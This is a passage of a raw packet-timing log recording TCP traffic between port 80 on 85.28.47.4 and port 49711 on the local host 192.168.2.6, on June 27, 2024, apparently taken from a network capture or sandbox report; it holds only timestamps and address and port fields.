                                                                Jun 27, 2024 05:58:10.389549017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389559031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389570951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389575958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389580965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389590979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389595985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389601946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389616013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389621973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389626980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389638901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.389640093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.389667034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390182018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390194893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390206099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390218019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390223980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390229940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390242100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390253067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390253067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390264988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390275002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390278101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390285969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390299082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390301943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390316010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390331030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390836000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390849113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390860081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390873909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390882969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390887022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390899897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390908003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390912056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390923023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390934944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390935898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390949011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390958071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390966892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390975952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.390978098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.390993118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391016960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391328096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391340017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391350985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391366959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391387939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391510963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391524076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391546965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391546965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391571999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391592979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391602993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391613960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391613960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391624928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391635895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391635895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391648054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391659021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391664982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391671896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391681910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391681910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.391709089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.391737938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392817020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392838001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392848015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392859936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392868996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392872095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392884016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392890930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392894030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392905951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392918110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392923117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392929077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392941952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392952919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392952919 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392963886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392975092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.392982960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392993927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.392993927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393004894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393018007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393021107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393060923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393384933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393400908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393410921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393429041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393430948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393448114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393450022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393461943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393471003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393472910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393484116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393492937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393495083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393507004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393517971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393528938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393532991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393541098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393552065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393552065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393563032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393570900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393573999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.393589973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.393616915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394309998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394323111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394332886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394345999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394354105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394361973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394372940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394372940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394383907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394395113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394404888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394406080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394418001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394428968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394439936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394440889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394452095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394463062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394464970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394474983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394484997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394485950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.394506931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.394526005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.395021915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.395061970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476238966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476284027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476295948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476310015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476330042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476340055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476342916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476353884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476368904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476373911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476409912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476439953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476655006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476666927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476680994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476691008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476696014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476696968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476705074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476782084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476782084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476888895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476902008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476936102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.476947069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476958990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476970911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476982117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.476984024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477005959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477046013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477338076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477360010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477371931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477379084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477381945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477391958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477395058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477406979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477408886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477417946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477431059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477431059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477443933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477451086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477454901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477466106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477477074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477483034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477487087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477499008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477504015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.477515936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.477531910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478149891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478163958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478177071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478187084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478199005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478210926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478219986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478220940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478233099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478233099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478245020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478255987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478264093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478267908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478280067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478290081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478291035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478302002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478308916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478317022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478323936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478352070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478863955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478877068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478888035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478898048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478909016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478919029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478921890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478930950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478941917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478944063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478955984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.478971004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.478987932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479461908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479474068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479485989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479497910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479511023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479510069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479522943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479535103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479535103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479547977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479556084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479559898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479571104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479576111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479582071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479593039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479595900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479604959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479615927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479624987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479628086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479640961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.479644060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479661942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.479684114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480407000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480418921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480428934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480439901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480452061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480456114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480463028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480474949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480477095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480496883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480498075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480509996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480515957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480521917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480536938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480545044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480547905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480560064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480571985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480573893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480587959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480593920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480598927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480607986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480611086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.480633020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.480658054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481337070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481350899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481362104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481374979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481384993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481391907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481404066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481410027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481415033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481426001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481437922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481448889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481455088 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481460094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481471062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481477976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481482029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481492996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481492996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481504917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481517076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481518984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481528997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481539965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481551886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481555939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.481563091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.481590033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.482203007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482217073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482227087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482238054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482249022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.482249975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482261896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482275009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482280970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.482285976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482297897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482310057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.482311964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.482331991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.482350111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.563551903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563580990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563594103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563606024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563618898 CEST804971185.28.47.4192.168.2.6
